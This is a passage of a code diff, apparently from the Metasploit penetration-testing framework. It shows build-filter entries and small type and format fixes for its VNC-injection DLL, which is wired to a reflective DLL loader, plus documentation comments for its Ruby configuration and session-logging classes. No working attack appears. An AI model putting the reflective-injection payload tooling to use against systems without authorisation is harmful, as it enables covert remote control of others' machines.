<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeHexT.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncoder.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeTight.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlib.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlibHex.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="omnithread\nt.cpp">
<Filter>Source Files\omnithread</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcdctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jchuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcinit.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcomapi.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcparam.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcprepct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jctrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatadst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatasrc.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jddctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdhuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdinput.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmerge.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdpostct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdtrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jerror.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctred.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemnobs.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant1.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant2.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jutils.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="zlib\adler32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\compress.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\crc32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\deflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infblock.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infcodes.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inffast.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inftrees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\maketree.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\trees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\uncompr.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\zutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="d3des.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="DynamicFn.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="FileTransferItemInfo.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="MinMax.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="RectList.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="stdhdrs.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinitcmtemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="translate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="TsSessions.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VideoDriver.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncauth.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncBuffer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncClient.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncDesktop.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncInstHandler.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncKeymap.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncRegion.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncServer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncService.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncSockConnect.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VSocket.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="WallpaperUtils.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="omnithread\omnithread.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="common.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jchuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jconfig.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdct.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdhuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jerror.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jinclude.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmemsys.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmorecfg.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpegint.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpeglib.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jversion.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="zlib\deflate.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infblock.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infcodes.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffast.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffixed.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inftrees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\trees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zconf.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zlib.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="AdministrationControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="d3des.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="DynamicFn.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="FileTransferItemInfo.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="IncomingConnectionsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="InputHandlingControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="keysymdef.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MatchWindow.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MinMax.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="PollControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="QuerySettingsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="RectList.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfb.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfbproto.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="SharedDesktopArea.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="stdhdrs.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="translate.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="TsSessions.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VideoDriver.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncAbout.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncauth.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncBuffer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncClient.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncDesktop.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeCoRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeHexT.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncoder.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeTight.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlib.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlibHex.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncInstHandler.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncKeymap.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncPasswd.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncRegion.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncServer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncService.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncSockConnect.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VSocket.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VTypes.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="WallpaperUtils.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT">
<Filter>Header Files\winvnc</Filter>
</Text>
</ItemGroup>
</Project>

2
external/source/vncdll/winvnc/vncDesktop.cpp vendored Normal file → Executable file
View File

@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH]; TCHAR szFileName[MAX_PATH];
sprintf( sprintf(
szFileName, szFileName,
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp", "%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay, stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond, stm.wHour, stm.wMinute, stm.wSecond,
ptr); ptr);

2
external/source/vncdll/winvnc/vncdll.cpp vendored Normal file → Executable file
View File

@ -15,7 +15,7 @@
*/ */
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL; HANDLE hMessageMutex = NULL;

2
external/source/vncdll/winvnc/zlib/inffast.c vendored Normal file → Executable file
View File

@ -99,7 +99,7 @@ z_streamp z;
do { do {
r += s->end - s->window; /* force pointer in window */ r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */ } while (r < s->window); /* covers invalid distances */
e = s->end - r; e = (uInt)(s->end - r);
if (c > e) if (c > e)
{ {
c -= e; /* wrapped copy */ c -= e; /* wrapped copy */

2
external/source/vncdll/winvnc/zlib/inflate.c vendored Normal file → Executable file
View File

@ -334,7 +334,7 @@ z_streamp z;
} }
/* restore */ /* restore */
z->total_in += p - z->next_in; z->total_in += (uLong)(p - z->next_in);
z->next_in = p; z->next_in = p;
z->avail_in = n; z->avail_in = n;
z->state->sub.marker = m; z->state->sub.marker = m;

2
external/source/vncdll/winvnc/zlib/infutil.h vendored Normal file → Executable file
View File

@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */ /* defines for inflate input/output */
/* update pointers and return */ /* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;} #define UPDBITS {s->bitb=b;s->bitk=k;}
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;} #define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;} #define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT} #define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);} #define LEAVE {UPDATE return inflate_flush(s,z,r);}

View File

@ -3,22 +3,16 @@ require 'fileutils'
module Msf module Msf
###
#
# This class wraps interaction with global configuration that can be used as a # This class wraps interaction with global configuration that can be used as a
# persistent storage point for configuration, logs, and other such fun things. # persistent storage point for configuration, logs, and other such fun things.
#
###
class Config < Hash class Config < Hash
# # The installation's root directory for the distribution
# The installation root directory for the distribution
#
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..')) InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
#
# Determines the base configuration directory. # Determines the base configuration directory.
# #
# @return [String] the base configuration directory
def self.get_config_root def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797 # Use MSFCFGDIR environment variable first. See feature request #5797
@ -47,7 +41,11 @@ class Config < Hash
# #
# Default values # Default values
# #
# Default system file separator.
FileSep = File::SEPARATOR FileSep = File::SEPARATOR
# Default configuration locations.
Defaults = Defaults =
{ {
'ConfigDirectory' => get_config_root, 'ConfigDirectory' => get_config_root,
@ -68,247 +66,260 @@ class Config < Hash
# #
## ##
#
# Returns the framework installation root. # Returns the framework installation root.
# #
# @return [String] the framework installation root {InstallRoot}.
def self.install_root def self.install_root
InstallRoot InstallRoot
end end
# Returns the configuration directory default.
# #
# Calls the instance method. # @return [String] the root configuration directory.
#
def self.config_directory def self.config_directory
self.new.config_directory self.new.config_directory
end end
# Returns the global module directory.
# #
# Calls the instance method. # @return [String] path to global module directory.
#
def self.module_directory def self.module_directory
self.new.module_directory self.new.module_directory
end end
# Returns the path that scripts can be loaded from.
# #
# Calls the instance method. # @return [String] path to script directory.
#
def self.script_directory def self.script_directory
self.new.script_directory self.new.script_directory
end end
# Returns the directory that log files should be stored in.
# #
# Calls the instance method. # @return [String] path to log directory.
#
def self.log_directory def self.log_directory
self.new.log_directory self.new.log_directory
end end
# Returns the directory that plugins are stored in.
# #
# Calls the instance method. # @return [String] path to plugin directory.
#
def self.plugin_directory def self.plugin_directory
self.new.plugin_directory self.new.plugin_directory
end end
# Returns the user-specific plugin base path
# #
# Calls the instance method. # @return [String] path to user-specific plugin directory.
#
def self.user_plugin_directory def self.user_plugin_directory
self.new.user_plugin_directory self.new.user_plugin_directory
end end
# Returns the directory in which session log files are to reside.
# #
# Calls the instance method. # @return [String] path to session log directory.
#
def self.session_log_directory def self.session_log_directory
self.new.session_log_directory self.new.session_log_directory
end end
# Returns the directory in which captured data will reside.
# #
# Calls the instance method. # @return [String] path to loot directory.
#
def self.loot_directory def self.loot_directory
self.new.loot_directory self.new.loot_directory
end end
# Returns the directory in which locally-generated data will reside.
# #
# Calls the instance method. # @return [String] path to locally-generated data directory.
#
def self.local_directory def self.local_directory
self.new.local_directory self.new.local_directory
end end
# Returns the user-specific module base path
# #
# Calls the instance method. # @return [String] path to user-specific modules directory.
#
def self.user_module_directory def self.user_module_directory
self.new.user_module_directory self.new.user_module_directory
end end
# Returns the user-specific script base path
# #
# Calls the instance method. # @return [String] path to user-specific script directory.
#
def self.user_script_directory def self.user_script_directory
self.new.user_script_directory self.new.user_script_directory
end end
# Returns the data directory
# #
# Calls the instance method. # @return [String] path to data directory.
#
def self.data_directory def self.data_directory
self.new.data_directory self.new.data_directory
end end
# Returns the full path to the configuration file.
# #
# Calls the instance method. # @return [String] path to the configuration file.
#
def self.config_file def self.config_file
self.new.config_file self.new.config_file
end end
# Returns the full path to the history file.
# #
# Calls the instance method. # @return [String] path the history file.
#
def self.history_file def self.history_file
self.new.history_file self.new.history_file
end end
# Initializes configuration, creating directories as necessary.
# #
# Calls the instance method. # @return [void]
#
def self.init def self.init
self.new.init self.new.init
end end
# Loads configuration from the supplied file path, or the default one if
# none is specified.
# #
# Calls the instance method. # @param path [String] the path to the configuration file.
# # @return [Rex::Parser::Ini] INI file parser.
def self.load(path = nil) def self.load(path = nil)
self.new.load(path) self.new.load(path)
end end
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
# #
# Calls the instance method. # @param opts [Hash] Hash containing configuration options.
# # @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def self.save(opts) def self.save(opts)
self.new.save(opts) self.new.save(opts)
end end
#
# Updates the config class' self with the default hash. # Updates the config class' self with the default hash.
# #
# @return [Hash] the updated Hash.
def initialize def initialize
update(Defaults) update(Defaults)
end end
#
# Returns the installation root directory # Returns the installation root directory
# #
# @return [String] the installation root directory {InstallRoot}.
def install_root def install_root
InstallRoot InstallRoot
end end
#
# Returns the configuration directory default. # Returns the configuration directory default.
# #
# @return [String] the root configuration directory.
def config_directory def config_directory
self['ConfigDirectory'] self['ConfigDirectory']
end end
#
# Returns the full path to the configuration file. # Returns the full path to the configuration file.
# #
# @return [String] path to the configuration file.
def config_file def config_file
config_directory + FileSep + self['ConfigFile'] config_directory + FileSep + self['ConfigFile']
end end
# Returns the full path to the history file.
# #
# Returns the full path to the configuration file. # @return [String] path the history file.
#
def history_file def history_file
config_directory + FileSep + "history" config_directory + FileSep + "history"
end end
#
# Returns the global module directory. # Returns the global module directory.
# #
# @return [String] path to global module directory.
def module_directory def module_directory
install_root + FileSep + self['ModuleDirectory'] install_root + FileSep + self['ModuleDirectory']
end end
#
# Returns the path that scripts can be loaded from. # Returns the path that scripts can be loaded from.
# #
# @return [String] path to script directory.
def script_directory def script_directory
install_root + FileSep + self['ScriptDirectory'] install_root + FileSep + self['ScriptDirectory']
end end
#
# Returns the directory that log files should be stored in. # Returns the directory that log files should be stored in.
# #
# @return [String] path to log directory.
def log_directory def log_directory
config_directory + FileSep + self['LogDirectory'] config_directory + FileSep + self['LogDirectory']
end end
#
# Returns the directory that plugins are stored in. # Returns the directory that plugins are stored in.
# #
# @return [String] path to plugin directory.
def plugin_directory def plugin_directory
install_root + FileSep + self['PluginDirectory'] install_root + FileSep + self['PluginDirectory']
end end
#
# Returns the directory in which session log files are to reside. # Returns the directory in which session log files are to reside.
# #
# @return [String] path to session log directory.
def session_log_directory def session_log_directory
config_directory + FileSep + self['SessionLogDirectory'] config_directory + FileSep + self['SessionLogDirectory']
end end
#
# Returns the directory in which captured data will reside. # Returns the directory in which captured data will reside.
# #
# @return [String] path to loot directory.
def loot_directory def loot_directory
config_directory + FileSep + self['LootDirectory'] config_directory + FileSep + self['LootDirectory']
end end
#
# Returns the directory in which locally-generated data will reside. # Returns the directory in which locally-generated data will reside.
# #
# @return [String] path to locally-generated data directory.
def local_directory def local_directory
config_directory + FileSep + self['LocalDirectory'] config_directory + FileSep + self['LocalDirectory']
end end
#
# Returns the user-specific module base path # Returns the user-specific module base path
# #
# @return [String] path to user-specific modules directory.
def user_module_directory def user_module_directory
config_directory + FileSep + "modules" config_directory + FileSep + "modules"
end end
#
# Returns the user-specific plugin base path # Returns the user-specific plugin base path
# #
# @return [String] path to user-specific plugin directory.
def user_plugin_directory def user_plugin_directory
config_directory + FileSep + "plugins" config_directory + FileSep + "plugins"
end end
#
# Returns the user-specific script base path # Returns the user-specific script base path
# #
# @return [String] path to user-specific script directory.
def user_script_directory def user_script_directory
config_directory + FileSep + "scripts" config_directory + FileSep + "scripts"
end end
#
# Returns the data directory # Returns the data directory
# #
# @return [String] path to data directory.
def data_directory def data_directory
install_root + FileSep + self['DataDirectory'] install_root + FileSep + self['DataDirectory']
end end
#
# Initializes configuration, creating directories as necessary. # Initializes configuration, creating directories as necessary.
# #
# @return [void]
def init def init
FileUtils.mkdir_p(module_directory) FileUtils.mkdir_p(module_directory)
FileUtils.mkdir_p(config_directory) FileUtils.mkdir_p(config_directory)
@ -320,27 +331,31 @@ class Config < Hash
FileUtils.mkdir_p(user_plugin_directory) FileUtils.mkdir_p(user_plugin_directory)
end end
#
# Loads configuration from the supplied file path, or the default one if # Loads configuration from the supplied file path, or the default one if
# none is specified. # none is specified.
# #
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def load(path = nil) def load(path = nil)
path = config_file if (!path) path = config_file if (!path)
return Rex::Parser::Ini.new(path) return Rex::Parser::Ini.new(path)
end end
#
# Saves configuration to the path specified in the ConfigFile hash key or # Saves configuration to the path specified in the ConfigFile hash key or
# the default path is one isn't specified. The options should be group # the default path if one isn't specified. The options should be group
# references that have named value pairs. Example: # references that have named value pairs.
# #
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save( # save(
# 'ExampleGroup' => # 'ExampleGroup' =>
# { # {
# 'Foo' => 'Cat' # 'Foo' => 'Cat'
# }) # })
#
def save(opts) def save(opts)
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file) ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)

View File

@ -4,19 +4,19 @@ require 'msf/base'
module Msf module Msf
###
#
# This module provides an initialization interface for logging. # This module provides an initialization interface for logging.
#
###
class Logging class Logging
#Is logging initialized
#@private
@@initialized = false @@initialized = false
#Is session logging enabled
#@private
@@session_logging = false @@session_logging = false
#
# Initialize logging. # Initialize logging.
# #
# @return [void]
def self.init def self.init
if (! @@initialized) if (! @@initialized)
@@initialized = true @@initialized = true
@ -35,9 +35,13 @@ class Logging
end end
end end
# Enables a log source of name src. Creates the .log file in the
# configured directory if logging is not already enabled for this
# source.
# #
# Enables a log source. # @param src [String] log source name.
# # @param level [Integer] logging level.
# @return [void]
def self.enable_log_source(src, level = 0) def self.enable_log_source(src, level = 0)
if (log_source_registered?(src) == false) if (log_source_registered?(src) == false)
f = Rex::Logging::Sinks::Flatfile.new( f = Rex::Logging::Sinks::Flatfile.new(
@ -47,30 +51,33 @@ class Logging
end end
end end
#
# Stops logging for a given log source. # Stops logging for a given log source.
# #
# @param src [String] the log source to disable.
# @return [Boolean] true if successful. false if not.
def self.disable_log_source(src) def self.disable_log_source(src)
deregister_log_source(src) deregister_log_source(src)
end end
#
# Sets whether or not session logging is to be enabled. # Sets whether or not session logging is to be enabled.
# #
# @param tf [Boolean] true if enabling. false if disabling.
# @return [void]
def self.enable_session_logging(tf) def self.enable_session_logging(tf)
@@session_logging = tf @@session_logging = tf
end end
#
# Returns whether or not session logging is enabled. # Returns whether or not session logging is enabled.
# #
# @return [Boolean] true if enabled. false if disabled.
def self.session_logging_enabled? def self.session_logging_enabled?
@@session_logging || false @@session_logging || false
end end
#
# Starts logging for a given session. # Starts logging for a given session.
# #
# @param session [Msf::Session] the session to start logging on.
# @return [void]
def self.start_session_log(session) def self.start_session_log(session)
if (log_source_registered?(session.log_source) == false) if (log_source_registered?(session.log_source) == false)
f = Rex::Logging::Sinks::Flatfile.new( f = Rex::Logging::Sinks::Flatfile.new(
@ -82,9 +89,10 @@ class Logging
end end
end end
#
# Stops logging for a given session. # Stops logging for a given session.
# #
# @param session [Msf::Session] the session to stop logging.
# @return [Boolean] true if sucessful. false if not.
def self.stop_session_log(session) def self.stop_session_log(session)
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source) rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)

View File

@ -1,24 +1,25 @@
